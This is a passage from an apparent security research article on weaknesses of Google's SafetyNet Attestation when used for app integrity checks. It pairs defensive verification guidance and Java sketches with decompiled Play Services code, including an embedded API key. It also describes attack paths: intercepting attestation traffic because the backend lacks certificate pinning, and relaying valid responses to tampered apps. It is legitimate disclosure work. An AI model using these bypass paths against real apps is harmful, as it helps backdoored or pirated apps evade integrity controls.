Examining the value of SafetyNet Attestation as an Application Integrity Security Control

Google promotes the SafetyNet Attestation API as a tool to query and assess the integrity status of an Android device. The official documentation leaves no doubt that the main purpose of the SafetyNet Attestation API is to provide device integrity information to the server counterpart of mobile applications. The server counterpart may choose to limit the functionality available to an app if it is running on a device with compromised integrity protections. However, in the past year CENSUS has performed a number of assessments of mobile apps where SafetyNet was also used as an application integrity security check. Furthermore, best-practice documents such as ENISA's "Smartphone Secure Development Guidelines" of December 2016 clearly propose the use of SafetyNet as a measure to check an app's integrity status (see page 23).

To the best of our knowledge, Google has not publicly released any detailed official documentation or recommended the use of the SafetyNet Attestation API for application integrity purposes.

This situation has created confusion among app developers. Specifically, software vendors are struggling to evaluate both the actual protection value of the SafetyNet Attestation mechanism and the cost of designing, implementing and maintaining such a security control. Some of the implementations we've examined during assessments based trust decisions on unverified data, showed a lack of understanding of the underlying mechanisms, and sometimes relied on incomplete threat models.

This article aims to fill this knowledge gap by covering the current capabilities, limitations and insecurities of the SafetyNet Attestation API when used to implement application integrity security controls. While the primary focus is the application integrity aspects of SafetyNet-based implementations, the majority of the presented findings are applicable to the device integrity mechanisms too. However, an in-depth analysis of the latter is beyond the scope of this article.

Expectations of Application Integrity Security Controls

Defining a complete, accurate and practical threat model that covers all applicable application integrity threats is among the toughest (but nonetheless important) tasks in a mobile app risk assessment. For the purposes of this article a simplified threat taxonomy is used that categorizes threats related to application integrity in three (3) groups:

- Pre-Installation: The threat actor targets the application assets before the bundle is installed on the victim's device. To attack a signed resource, the attacker would either need to re-sign the application with a 3rd-party certificate or exploit an OS vulnerability (e.g. MasterKey). Some notable threats in this category are:

  - Static Code Tampering. Application code (bytecode or native libraries) binary patching.

  - Static Data Tampering. Modifications to application resources / assets.

  - Loader Injection. The original APK is included as a raw resource and is launched from a 3rd-party malicious bytecode loader.

- Post-Installation: The threat actor targets the application assets after the bundle has been installed on the victim's device but before it has been launched. As long as the attacker's technique does not modify the original APK (as stored under /data/app/<pkg>), no code re-signing is required. Some notable threats in this category are:

  - Compiled Code Tampering. Optimized application bytecode (OAT, VDEX, ART) static patching.

  - Tampering of Extracted Native Libraries. Static patching of /data/app/<pkg>/lib/<ISA>/<libName>.so.

- Runtime: The threat actor targets the application assets during the application launch (load-time attacks) or while it's running. Usually these attacks are categorized as dynamic tampering, since they modify the application assets in memory and do not modify the local storage copies. Some notable threats in this category are:

  - Method Hooking. Java bytecode, optimized native bytecode or JNI code is dynamically modified by redirecting code execution to an alternative implementation that has been loaded in the memory of the victim process.

  - Bootstrap Code Injection. Malicious code is executed before the legitimate application code to control runtime resources (classpath, library paths, environment paths, etc.).

  - Dynamic Data Tampering. Loaded app data (e.g. constant values) or generated app data (e.g. decrypted strings) are tampered with in memory.

The threat actor objectives vary from application to application. The most prevalent ones are:

- Security Control Tampering: Disable a locally enforced security mechanism implemented by the application (DRM, certificate pinning, data encryption mechanism, etc.).

- Application Internals Analysis: Use runtime tampering attacks as a tool to assist reverse engineering of application internals.

- Identity Spoofing: Force the application to transmit device fingerprints and user identities that do not match the expected behavior of the application (e.g. bypass device enrollment mechanisms).

- Credentials Phishing: Steal victim user credentials and other sensitive information.

- Reputation Damage: Release proof-of-concept attacks and malicious code injection evidence to public media.

- Unauthorized Use: Consume the underlying application API and the application features in ways that were not provisioned from the manufacturer (e.g. run the application without advertisements).

- Information Disclosure: Obtain access to application runtime data that were designed to be hidden from the end-user (session tokens, cryptographic keys, device fingerprints, etc.).

The overall effectiveness of an application integrity security control can be measured as the level of protection (exploitation effort, attack requirements, automation possibility etc.) it offers against threat actors manifesting applicable threats to accomplish their objectives. However, without a complete threat model it is very hard to quantify the maturity of the implemented protection levels. This means that to measure the maturity of a certain app integrity mechanism one must also consider the specifics / context of a particular app. As such, this article will not try to directly calculate the strength of the examined controls.

It is also important to mention that the aforementioned threats focus solely on the tampering of application code & bundled assets. They do not aim to cover device integrity (root detection), reverse engineering (obfuscation), derived application data (secure storage) or system framework tampering (system libraries hooking) threats. Although these threats apply to application protection in a broader sense, they are outside the scope of this article.

SafetyNet Attestation Architecture Overview

The SafetyNet Attestation API is implemented as part of Google Play Services (com.google.android.gms), and thus requires an Android device with the Google applications installed. The design principle behind SafetyNet is very simple, and effectively boils down to a Google-controlled service that runs in the background, collects software and hardware information from the device and compares this information against a long list of approved device profiles. A device profile is considered approved by Google as long as it has successfully passed the Android Compatibility Test Suite (CTS).



The SafetyNet Attestation mechanism includes the following four (4) entities:

- Requester: The mobile application that requests evidence that it is running on an approved device. The Requester app effectively initiates the SafetyNet attestation process.

- Collector: The background GMS service that runs on the mobile device and collects system information. The collector performs both on demand and scheduled tasks in the background and is the component that communicates with the remote Attester. The Requester attestation queries are dispatched to Collector for execution.

- Attester: The remote signing authority that evaluates the Collector evidence data and provides a digitally signed response with the device status verdict (JWS attestation result). On top of the device status flags (ctsProfileMatch, basicIntegrity), the result payload also includes information about the Requester (app info) and the certificate chain that is needed by the Verifier to validate its authenticity. This component is implemented by the remote Google API services (www.googleapis.com).

- Verifier: The user component that processes the attestation result, verifies its validity and enforces the security decisions based on the result data. The verification logic can be implemented either by the mobile application itself (client-side validation) or by the remote application server (server-side validation).

Both Google and most of the information security community have acknowledged that the SafetyNet Attestation API has real value only if the security decisions are implemented and enforced by the application server (server-side validation). For the application integrity case study this argument is even stronger, because the design principle requires a trusted component (app server) to verify an untrusted asset (mobile app code) via a secure chain of checks (integrity signatures). As such, for the rest of the article we'll focus only on server-side Verifier implementations.

The following figure (obtained from the official documentation) illustrates the SafetyNet Attestation protocol, which involves the following steps:

- The mobile app (Requester) makes a call to the SafetyNet Attestation API (Collector).

- The API (Collector) requests a signed response using its backend (Attester).

- The backend (Attester) sends the response to Google Play services (Collector).

- The signed response is returned to the mobile app (Requester).

- The Requester forwards the signed response to a trusted application server (Verifier).

- The server verifies the response, enforces the appropriate security policies and sends the result of the verification process back to Requester.

Figure 1: SafetyNet Protocol

The attestation result payload has a JSON Web Signature (JWS) format that contains three Base64url-encoded data chunks separated by the dot ('.') character. The RSA-based JSON Web Signature (JWS) provides integrity, authenticity and non-repudiation to JSON Web Tokens (JWT).

- Header: Contains the utilized signing algorithm (currently only RS256) and the X.509 certificate chain which will be used to verify the JWT signature.

- Attestation Data: The useful data that the Attester wants to pass through to the Verifier. A detailed description for each parameter is available in the official documentation.

- Signature: The result of the RSA signing process applied to the SHA-256 hash of the encoded JWS Header and the encoded Attestation Data, joined by the dot character.

    {
      "alg": "RS256",
      "x5c": [
        "<cert[0]: leaf (DER base64 string)>",
        "<cert[1]: CA (DER base64 string)>"
      ]
    }

    {
      "nonce": "9Eb498HlI81ZtpxKTXYNJkLNOnOqTf+sFuPXrua/20o=",
      "timestampMs": 1509265519397,
      "apkPackageName": "com.censuslabs.secutils",
      "apkDigestSha256": "1/jOgB8Bt3m8bSjrAMaNHLDDkgHizClMuct6XfBA7LY=",
      "ctsProfileMatch": true,
      "apkCertificateDigestSha256": [
        "SQtCPHONk9ZLtYomWo6XfzonOrHXbXs2rBX0rqBCWiE=",
        "BmpU4zeWoW3KYmJfqGyKNG6wEw+48e/VKGvyztMFUwg="
      ],
      "basicIntegrity": true
    }

Signature = base64url(RSA_SIGN(SHA-256(base64url(Header) + "." + base64url(Attestation Data))))
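To make the message layout concrete, the following is a minimal sketch of how a Verifier could split the compact JWS string into its three chunks before any cryptographic check takes place. The `JwsParts` class and its field names are our own hypothetical helper and not part of any SafetyNet or JWT library. The sketch assumes the base64url alphabet that the JWS specification (RFC 7515) prescribes, and it leaves the decoded Header and Attestation Data as raw JSON text for a JSON parser of choice.

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Hypothetical helper, not part of any SafetyNet or JWT library.
final class JwsParts {
    final String headerJson;    // decoded JWS Header (JSON text)
    final String payloadJson;   // decoded Attestation Data (JSON text)
    final byte[] signature;     // raw signature bytes
    final String signingInput;  // "<encoded header>.<encoded payload>"

    private JwsParts(String headerJson, String payloadJson,
                     byte[] signature, String signingInput) {
        this.headerJson = headerJson;
        this.payloadJson = payloadJson;
        this.signature = signature;
        this.signingInput = signingInput;
    }

    // Throws IllegalArgumentException on a malformed message.
    static JwsParts parse(String compactJws) {
        // limit -1 keeps trailing empty strings, so "a.b." still yields 3 chunks
        String[] chunks = compactJws.split("\\.", -1);
        if (chunks.length != 3) {
            throw new IllegalArgumentException("expected exactly three chunks");
        }
        for (String chunk : chunks) {
            if (chunk.isEmpty()) {
                throw new IllegalArgumentException("empty chunk");
            }
        }
        Base64.Decoder decoder = Base64.getUrlDecoder(); // JWS uses base64url
        String header = new String(decoder.decode(chunks[0]), StandardCharsets.UTF_8);
        String payload = new String(decoder.decode(chunks[1]), StandardCharsets.UTF_8);
        byte[] sig = decoder.decode(chunks[2]);
        return new JwsParts(header, payload, sig, chunks[0] + "." + chunks[1]);
    }
}
```

Keeping `signingInput` as the original encoded text matters: the signature covers the encoded chunks exactly as received, not a re-serialization of the decoded JSON.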

Verifying Attestation Responses

Validating the JWS Payload

The SafetyNet official documentation recommends implementing the following checks when verifying the attestation response (JWS payload):

- Extract the SSL certificate chain from the JWS message.

- Validate the SSL certificate chain and use SSL hostname matching to verify that the leaf certificate was issued to the hostname "attest.android.com".

- Use the certificate to verify the signature of the JWS message.

- Check the data of the JWS message to make sure it matches the data within your original request. In particular, make sure that the nonce, timestamp, package name, and the SHA-256 hashes match.

Unfortunately, this official list poorly describes the technical details that are required to perform a cryptographically secure verification of the certificate chain and the signed payload. The published source code samples also provide limited information and hide most of the implementation details behind client JSON Web Token libraries.

The attestation payload verification process involves many technical checks, the details of which are very important, as a flaw in the checking procedure may compromise the entire control. A list of things to keep in mind when auditing Verifier implementations follows:

- Message Format & Compatibility

  - The JWS response has exactly three base64-encoded chunks separated by the dot character.

  - None of the three chunks is empty.

  - A supported signing algorithm is used (e.g. RS256: RSA with SHA-256 signing).

- Message Integrity

  - The JWS Header contains one and only one cryptographically valid certificate chain.

  - The certificate chain includes a Google-issued leaf certificate and a parent certificate that was issued and signed by a trusted root certificate authority.

  - All included certificates must be checked for revocation (CRL & OCSP) to verify that they are still valid.

  - Certificate pinning against the Google CA is also strongly recommended, to protect against misbehaving or compromised CAs that are included in the application server's default trust manager.

  - The JWS Signature should be verifiable with the public key of the leaf certificate in the Header chain. It is strictly defined that the first certificate in the chain (leaf) is the one containing the expected public key.

- Message Authenticity

  - Verify that the leaf certificate contained within the JWS Header was issued for the 'attest.android.com' hostname.

  - The hostname verifier should accept the 'attest.android.com' domain string only when it is found in the provisioned certificate parameters (CN or SAN).

- Elapsed Time

  - The elapsed time between the nonce generation (server-side maintained timestamp) and the attestation (timestampMs parameter in the JSON response) is within an accepted range.

  - The elapsed time between the matching nonce generation (server-side maintained timestamp) and the arrival of the attestation response at the application server (timestamp calculated by the application server when the request is received) is within an accepted range.
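As an illustration of the signature item in the list above, the following sketch verifies the RS256 signature of a compact JWS with the standard `java.security.Signature` API. It is a sketch under stated assumptions and not a complete Verifier: the `JwsSignatureCheck` class is a hypothetical name of ours, and `leafKey` is assumed to be the public key of the first certificate in the Header chain, obtained only after the chain validation, revocation, pinning and hostname checks (none of which are shown here) have passed.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.PublicKey;
import java.security.Signature;
import java.util.Base64;

// Hypothetical helper: checks only the signature, nothing about the chain.
final class JwsSignatureCheck {

    // Returns true only if the third chunk is a valid RSA/SHA-256 signature
    // over "<chunk0>.<chunk1>" made with the private half of leafKey.
    static boolean verifyRs256(String compactJws, PublicKey leafKey) {
        String[] chunks = compactJws.split("\\.", -1);
        if (chunks.length != 3) {
            return false;
        }
        for (String chunk : chunks) {
            if (chunk.isEmpty()) {
                return false;
            }
        }
        try {
            byte[] signature = Base64.getUrlDecoder().decode(chunks[2]);
            // The algorithm is fixed by the Verifier and is deliberately not
            // taken from the attacker-controllable "alg" field of the Header.
            Signature verifier = Signature.getInstance("SHA256withRSA");
            verifier.initVerify(leafKey);
            verifier.update((chunks[0] + "." + chunks[1])
                    .getBytes(StandardCharsets.US_ASCII));
            return verifier.verify(signature);
        } catch (GeneralSecurityException | IllegalArgumentException e) {
            // Wrong key type, malformed signature or bad base64: fail closed.
            return false;
        }
    }
}
```

A Verifier would still need to compare the Header's algorithm value against its own list of supported algorithms and reject anything else before reaching this point.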

If all the previous checks are successfully passed, the Verifier can proceed with the attestation data processing. The following sections describe how this data can be used to implement device and application integrity security controls.

Device Integrity

Despite not being the primary goal of this article, some quick comments around the device integrity checks are presented in this section.

The device integrity verification requirements are very simple since the SafetyNet API backend is dealing with all the technical bits when profiling the Requester device. The only responsibility of the Verifier is to ensure that both the ctsProfileMatch and basicIntegrity boolean parameters of the attestation data are set to true.

When both flags are set to true, the device (against which the SafetyNet attestation was performed) is, most likely, an approved (CTS compatible) device and its security mechanisms (SELinux, DM-Verity, Secure-Boot, etc.) have not been tampered with (basic integrity).
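A minimal sketch of this check follows. It assumes that the Attestation Data has already been signature-verified and parsed into a `Map` by a JSON library of choice; the `DeviceIntegrityPolicy` class name is hypothetical. The only design point worth showing is that the check fails closed: a missing flag, or a flag that is not a JSON boolean, is treated the same as `false`.

```java
import java.util.Map;

// Hypothetical helper operating on already verified and parsed Attestation Data.
final class DeviceIntegrityPolicy {

    // True only when both flags are present and are the boolean value true.
    static boolean deviceTrusted(Map<String, Object> attestationData) {
        return Boolean.TRUE.equals(attestationData.get("ctsProfileMatch"))
                && Boolean.TRUE.equals(attestationData.get("basicIntegrity"));
    }
}
```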

It is important to mention that Google does not guarantee under any terms that the client-side SafetyNet attestation service cannot be abused. The overall maturity of the SafetyNet services does seem to be constantly improving, which increases the effort required to reverse engineer and bypass each regularly updated version. Even so, these controls should not be considered a tamper-proof device integrity solution.

Application Integrity

The implementation details of the application integrity security controls are much more complex compared to the device integrity ones. The Verifier needs to maintain a list of valid data-sets (application signature pins) for all the supported mobile applications that are authorized to communicate with the application server. More specifically, the server must maintain the following items for each supported application:

- The application's package name string (e.g. 'com.censuslabs.secutils')

- A list with all the APK signing certificate digests (SHA-256 hashes). For most cases this list will include only one certificate.

- A list with all the APK digests (SHA-256 hashes) of all the production bundles of the matching package name. This list includes the actual zip archive hashes of all the released production versions.

For the previous 3 items the following checks need to be implemented by the Verifier as part of the mobile application integrity checks:

- The 'apkPackageName' string matches one of the maintained integrity configuration sets (package name pin)

- All the signing certificate digests that are included in the 'apkCertificateDigestSha256' array are identical to the pinned hashes. The matched pinned hashes should correspond to the provisioned package name.

- The 'apkDigestSha256' hash matches exactly one of the pinned hashes and belongs to the same group of pins with the package name and signing certificates digests.
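The three checks above can be sketched as a single pin-set comparison. The `AppPinSet` class below is a hypothetical structure of ours; it assumes the Attestation Data fields have already been extracted from a verified JWS payload, and it interprets "identical to the pinned hashes" as set equality between the reported and the pinned signing certificate digests.

```java
import java.util.HashSet;
import java.util.List;
import java.util.Set;

// Hypothetical pin set for one supported application (one package name).
final class AppPinSet {
    private final String packageName;
    private final Set<String> certDigests; // pinned signing certificate digests
    private final Set<String> apkDigests;  // digests of all released bundles

    AppPinSet(String packageName, List<String> certDigests, List<String> apkDigests) {
        this.packageName = packageName;
        this.certDigests = new HashSet<>(certDigests);
        this.apkDigests = new HashSet<>(apkDigests);
    }

    // All three values must match pins that belong to the same application.
    boolean matches(String apkPackageName,
                    List<String> apkCertificateDigestSha256,
                    String apkDigestSha256) {
        if (!packageName.equals(apkPackageName)) {
            return false;
        }
        if (apkCertificateDigestSha256 == null || apkCertificateDigestSha256.isEmpty()) {
            return false;
        }
        // Assumption: the reported signer set must equal the pinned signer set.
        if (!new HashSet<>(apkCertificateDigestSha256).equals(certDigests)) {
            return false;
        }
        return apkDigestSha256 != null && apkDigests.contains(apkDigestSha256);
    }
}
```

A server that verifies several applications would hold one such pin set per package name and accept a response only if the pin set selected by `apkPackageName` matches as a whole, rather than matching each value against a global pool of hashes.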

The previous checks aim to verify that the application information of the Requester that executed the SafetyNet attestation matches one of the authorized production release profiles. This is effectively a form of implicit application integrity that aims to mitigate threats of the Pre-Installation category. The SafetyNet Attestation API is not currently capable of providing any further application integrity protection for the Post-Installation and Runtime groups of threats.

Considering the list of dataset requirements, it is obvious that developers need a great level of control and automation in their build environment to fulfill them efficiently. The automation complexity and maintenance cost of these pinned signature datasets increase significantly if the same application server verifies more than one application package (which is very common).



The Requester Verification Problem

The fundamental challenge of SafetyNet Attestation designs that implement the Verifier component on the application server is Requester verification. The Verifier has no obvious method to strongly verify that the client endpoints which a) request the Nonce, b) run the attestation procedure and c) forward the JWS message are the same entity. In other words, the Verifier has no direct knowledge of whether the JWS message was generated by the same app that forwards it, or whether the attested device is the same one that app is running on. This design limitation exposes the device and application integrity controls to a wide range of hijack and data tampering attacks.

For example a tampered application can forward a JWS response that was generated from a different client and successfully satisfy the application integrity requirements. The different client can be either the original application running on the same device, or the original application running on a different device. The latter can also bypass the device integrity mechanism assuming that the second device has not been tampered with.

It is conceivable that the above attack will be performed in a manual and targeted manner (e.g. an individual adversary aiming to bypass security controls). However, it is technically possible for such an attack to be fully automated and performed at a larger scale. For example, a malware author can establish a series of untampered installations producing valid attestation responses, which are then forwarded to tampered versions of the application (e.g. backdoored apps distributed via illegal stores) that consume them to satisfy integrity controls and proceed with authorized connections.

The exploitation requirements and effort that is required to perform such an attack highly depend on the underlying communication protocol attributes (session state capabilities, transport security, message integrity, client authenticity, etc.) and the presence of other security controls (e.g. device integrity). The following figure illustrates some potential attack entry points that have been identified when examining a typical SafetyNet attestation implementation:

Figure 2: Potential attack entry points to SafetyNet implementation



Attack Surface Reduction

Efficiently mitigating this SafetyNet Attestation API design limitation is a very challenging task that highly depends on the customer communication protocol characteristics. Until Google revises and improves the SafetyNet APIs, the developers can only solve this problem indirectly, by hardening against all possible attack paths with additional security mechanisms. The following security controls can be used to protect the application integrity mechanisms:

- Application Secure Transport & Certificate Pinning: Will prevent an adversary from hijacking and modifying data exchanges without first tampering with the mobile application assets. In other words an adversary is forced to either tamper with the application or the system functionalities.

- Device Integrity Enforcement: It would be useless to utilize a SafetyNet application integrity mechanism without enforcing a device integrity protection too. This control will significantly increase the exploitation effort required from an adversary to tamper with the components that implement the SafetyNet attestation API (e.g. hook collected APK signature data). A false signal from this control indicates that the Requester & Collector runtime cannot be trusted and thus authorization should be denied from the Verifier.

- State-Aware Connections: The application server should be able to verify that Nonce tokens and Attestation Data are not only valid in general (global memory), but valid as a pair for an individual communication session (scoped memory). In addition, the application server should treat only the most recently generated Nonce as valid, regardless of whether older ones were ever consumed. This will prevent an adversary from abusing the Verifier integrity mechanisms by using JWS messages that were generated from Nonce payloads that belong to different sessions / clients.

- Multiple Checks Spread Across the App Runtime: Will increase the effort required from an adversary to identify and circumvent all security control points. In addition, regular checks will reduce the likelihood of an authorized connection being active for large time-frames using outdated Collector data (e.g. attack happened while application was running).
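The State-Aware Connections control, together with the elapsed-time checks discussed earlier, could be sketched as a per-session Nonce store. Everything in this sketch is an assumption made for illustration: the `SessionNonceStore` class, the opaque `sessionId` string and the single `maxAgeMs` window are hypothetical names, clock-skew tolerance between the server and the Attester is omitted, and a production server would keep this state in its session layer rather than in an in-memory map.

```java
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.HashMap;
import java.util.Map;

// Hypothetical in-memory store: one valid Nonce per session, single use.
final class SessionNonceStore {
    private static final class Entry {
        final byte[] nonce;
        final long issuedAtMs;
        Entry(byte[] nonce, long issuedAtMs) {
            this.nonce = nonce;
            this.issuedAtMs = issuedAtMs;
        }
    }

    private final Map<String, Entry> latestBySession = new HashMap<>();
    private final SecureRandom random = new SecureRandom();
    private final long maxAgeMs;

    SessionNonceStore(long maxAgeMs) {
        this.maxAgeMs = maxAgeMs;
    }

    // Issuing a new Nonce silently invalidates the previous one of the session.
    synchronized byte[] issue(String sessionId, long nowMs) {
        byte[] nonce = new byte[32];
        random.nextBytes(nonce);
        latestBySession.put(sessionId, new Entry(nonce.clone(), nowMs));
        return nonce;
    }

    // attestedAtMs is the timestampMs value of the verified Attestation Data.
    synchronized boolean redeem(String sessionId, byte[] reportedNonce,
                                long attestedAtMs, long nowMs) {
        Entry entry = latestBySession.remove(sessionId); // any attempt consumes it
        if (entry == null || reportedNonce == null) {
            return false;
        }
        if (!MessageDigest.isEqual(entry.nonce, reportedNonce)) {
            return false;
        }
        boolean attestedInWindow = attestedAtMs >= entry.issuedAtMs
                && attestedAtMs - entry.issuedAtMs <= maxAgeMs;
        boolean receivedInWindow = nowMs >= entry.issuedAtMs
                && nowMs - entry.issuedAtMs <= maxAgeMs;
        return attestedInWindow && receivedInWindow;
    }
}
```

Because a JWS message is accepted only against the Nonce issued to the session that forwards it, a response obtained in another session or by another client no longer satisfies the Verifier on its own. It does not solve the Requester Verification Problem, since an adversary who relays the Nonce itself to an untampered installation is not stopped by this control alone.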

In addition to the previous controls, it is expected that Google has implemented sufficient controls for the SafetyNet backend API communications. More specifically, the following checks are required to ensure that transmitted data cannot be directly eavesdropped, tampered or replaced:

- Secure Transport & Certificate Pinning: Will prevent a Man-In-The-Middle ("MitM") adversary from hijacking the SafetyNet attestation request (Nonce, system information, etc.) or response (JWS message) data. Furthermore, if Google's strict TrustManager is enforced, a 3rd-party CA installed system-wide will be ignored.

- Message Integrity: Will prevent a MitM adversary from tampering with the SafetyNet attestation request data. The attestation response (JWS message) is already signed, so protection against direct tampering is not required. However, it is expected that the response is protected against replacement attacks (a MitM adversary swapping the JWS response with another transaction's signed payload).

Of course, modifying these controls lies beyond the capabilities of the end-users. However, they are presented to indicate that an attack to the SafetyNet attestation implementation can occur from the Google API communications side, if not protected properly. Section "Identified Insecurities" describes the insecurities that have been identified in the Google API communications that are utilized by SafetyNet.

Describing an Improved Design

The following figure illustrates an improved SafetyNet Attestation design prototype that includes all the aforementioned security mechanisms. This improved design aims to reduce the risk of the Requester Verification issue exploitation.

Figure 3: Reducing the risk of Requester verification issue exploitation

Identified Insecurities

Researched Software Versions and Devices

The findings that are presented in the following sections have been mainly confirmed against Google devices: Pixel (sailfish), Nexus 5x (bullhead) and Nexus 6p (angler). Our research has covered both the Nougat (API-24 & API-25) and Oreo (API-26) Android OS releases. Most of our findings should affect the Marshmallow (API-23) release too. In terms of Google Play Services versions, we have examined all 10.x and 11.x releases.

The following list presents the exact versions that were used to obtain the evidence that is included in the following sections:

- Google Play Services version: 11.5.18 (940)

- SafetyNet jar version 03242017-10001000

- Google Pixel (sailfish) device running Android OS version 8.0.0 with Oct. 2017 security patches

However, all the identified insecurities have been also confirmed against the latest (at the time of writing) versions:

- Google Play Services version: 11.7.45 (940)

- Google Pixel (sailfish) device running Android OS version 8.0.0 with Nov. 2017 security patches

At this point it is also important to mention that the following code snippets have been mainly extracted from JEB2 when reverse engineering the GMS & SNET bytecode. Some identifiers have been manually renamed to improve readability.

If you wish to download the latest SafetyNet JAR without reverse engineering the Play Services APK, you can use our offline extractor tool, available here.



#1. Lack of Certificate Pinning with SafetyNet API Backend

When the team started investigating the SafetyNet Attestation API, we were surprised to notice that we were able to intercept the HTTPS traffic between our client and the Google API backend. A simple user-installed certificate and a trivial MitM setup were enough to intercept both the SafetyNet API and the DroidGuard anti-abuse calls on the latest version of the Android OS. The following figure illustrates a sample attestation request message capture that was formatted with a protobuf decoder Burp plugin:

Figure 4: Sample attestation request capture in Burp

This MitM capability, which did not require tampering with the Play Services custom trust managers and socket factories (e.g. 'com.google.android.gms.common.net.SSLCertificateSocketFactory'), was not expected and was therefore investigated further. Reverse engineering the HTTP request generation classes of the GMS application showed that it is effectively due to an insecure default Trust Manager. Instead of using the secure classes that are defined in the GMS application, the SafetyNet attestation class that generates the HTTPS request for the backend uses the default URLConnection class (line 15).

01: public class SnetAttest extends mjc {

02: ...

03: private final aegc SnetAttestPost(Context arg8, aegb arg9) {

04: ...

05: URLConnection v2_1;

06: URLConnection v0_3;

07: ...

08: try {

09: aeca.a(arg8);

10: v1 = TextUtils.isEmpty(this.developerAPIKey) ? "AIzaSyDqVnJBjE5ymo--oBJt3On7HQx9xNm1RHA" : this.developerAPIKey;

11: v3 = String.valueOf(aeca.k.b());

12: String v0_2 = String.valueOf(v1);

13: v0_2 = v0_2.length() != 0 ? v3.concat(v0_2) : new String(v3);

14: v1 = new StringBuilder(String.valueOf(SnetAttest.userAgentVersion).length() + 10 + String.valueOf(Build.DEVICE).length() + String.valueOf(Build.ID).length()).append(SnetAttest.userAgentVersion).append(" (").append(Build.DEVICE).append(" ").append(Build.ID).append("); gzip").toString();

15: v0_3 = new URL(v0_2).openConnection();

16: }

17: catch(IOException v0) { goto label_85; }

18: catch(Throwable v0_1) { goto label_129; }

19: try { v3 = "Content-Type"; goto label_45; }

20: catch(Throwable v1_1) {

21: label_144:

22: v3_1 = ((InputStream)v2);

23: v2_1 = v0_3;

24: v0_1 = v1_1;

25: goto label_130;

26: }

27: catch(IOException v1_2) { }

28: catch(Throwable v0_1) {

29: label_129:

30: v3_1 = ((InputStream)v2);

31: goto label_130;

32: try {

33: label_45:

34: ((HttpURLConnection)v0_3).setRequestProperty(v3, "application/x-protobuf");

35: ...

36: }

37: catch(IOException v1_2) { goto label_101; }

38: catch(Throwable v1_1) { goto label_144; }

39: try {

40: v3_2 = new DataOutputStream(((HttpURLConnection)v0_3).getOutputStream()); // No SSL-related changes are applied to the URLConnection instance

41: }

Since the GMS APK is targeting API 23 (targetSdkVersion=23), despite being built against more recent APIs, the default behavior is to trust both system default and user installed certificates.

<?xml version="1.0" encoding="utf-8"?>

<manifest android:sharedUserId="com.google.uid.shared" android:sharedUserLabel="@string/ab" android:versionCode="11518940" android:versionName="11.5.18 (940-170253583)" package="FFFFFFFFFFFFFFFFFFFFFF" platformBuildVersionCode="26" platformBuildVersionName="8.0.0" xmlns:android="http://schemas.android.com/apk/res/android">

<uses-sdk android:minSdkVersion="26" android:targetSdkVersion="23" />

<uses-feature android:name="android.hardware.location" android:required="false" />

<uses-feature android:name="android.hardware.location.network" android:required="false" />

<uses-feature android:name="android.hardware.location.gps" android:required="false" />

The DroidGuard functionality is beyond the scope of this article, so let's skip this part. Moving to the attestation request payload, the data members of the protobuf message can be easily determined by inspecting the corresponding class members. The following code snippet describes the 9 members that compose the first part of the attestation request. The second part of the payload is the attestation anti-abuse contentBinding, which wraps the hash (SHA-256) of the first part. The purpose of the content binding mechanism is to prevent tampering at the transport level.

    public final class AttestationRequestData extends aybz {
        public byte[] nonce;
        public String pkgName;
        public byte[][] certDigests;
        public byte[] apkDigest;
        public int gplayVersion;
        public aegg[] suBinaries_su_exec_entries;
        public aegf selinuxStatus;
        public long timestamp;
        public boolean isUsingCNDomain; // China specific services
        ...
    }
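The idea behind such a content binding can be illustrated with a few lines of Java. This is only a sketch of the general principle (a SHA-256 hash computed over the serialized first part and compared on the receiving side). The `ContentBindingSketch` class is hypothetical, and how DroidGuard actually wraps and protects the hash is not covered here.

```java
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

// Hypothetical illustration of binding a hash to a serialized request.
final class ContentBindingSketch {

    // SHA-256 over the serialized first part of the request.
    static byte[] bind(byte[] serializedRequest) {
        try {
            return MessageDigest.getInstance("SHA-256").digest(serializedRequest);
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 unavailable", e);
        }
    }

    // Receiver side: recompute the hash and compare it in constant time.
    static boolean matches(byte[] serializedRequest, byte[] contentBinding) {
        return MessageDigest.isEqual(bind(serializedRequest), contentBinding);
    }
}
```

Any change to the serialized members in transit changes the recomputed hash, so the binding only protects the request as long as the adversary cannot also regenerate or replace the binding itself.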

In addition, it is important to mention that the attestation response (JWS message) is not protected by a protocol-level integrity mechanism. Tampering with the actual JWS message data is not possible, because the JWT is signed by Google, but replacing it with another JWS response is possible.

Putting the facts together, the lack of certificate pinning against the SafetyNet API backend enables a MitM adversary to hijack attestation request and response data, and also to replace the JWS response payloads. These might not have a critical direct impact on the SafetyNet Attestation API itself, but combined with "The Requester Verification Problem" they form an actionable attack path that can be used to bypass application integrity implementations. This attack path can prove catastrophic for stateless (session-less) customer APIs.

We hope that Google revises its policy for the GMS / SNET API calls and enforces a secure trust manager across the board.
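For readers unfamiliar with pinning, the following sketch shows one common form of it: comparing the SHA-256 hash of a certificate's public key (its SubjectPublicKeyInfo encoding) against a fixed allow-list. This is a generic technique that we use for illustration, not a description of what GMS does or of how Google would implement it. The `SpkiPinCheck` class and the pin format are assumptions, and such a check would run inside a custom trust manager after the regular chain validation has succeeded.

```java
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.PublicKey;
import java.util.Base64;
import java.util.List;
import java.util.Set;

// Hypothetical public key pin check, applied after normal chain validation.
final class SpkiPinCheck {

    // Base64 of SHA-256 over the key's X.509 SubjectPublicKeyInfo encoding.
    static String pinOf(PublicKey key) {
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256").digest(key.getEncoded());
            return Base64.getEncoder().encodeToString(digest);
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 unavailable", e);
        }
    }

    // Accept the chain only if at least one of its keys is on the allow-list.
    static boolean chainIsPinned(List<PublicKey> chainKeys, Set<String> allowedPins) {
        for (PublicKey key : chainKeys) {
            if (allowedPins.contains(pinOf(key))) {
                return true;
            }
        }
        return false;
    }
}
```

With a check of this kind in place, a user-installed CA certificate would still produce a chain that validates, but none of its keys would match the allow-list and the connection would be refused.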

#2. Tampering with Collector Mechanisms / Data

Google Play Services runs as a normal low-privilege user and is confined to the priv_app SELinux domain, because the original APK resides under /system/priv-app in factory ROMs. The priv_app domain provides certain privileges that the normal untrusted_app (or the more recent untrusted_app_25) domain does not have (more info at "system/sepolicy/private/priv_app.te").

sailfish:/ $ ps -AZ | grep gms

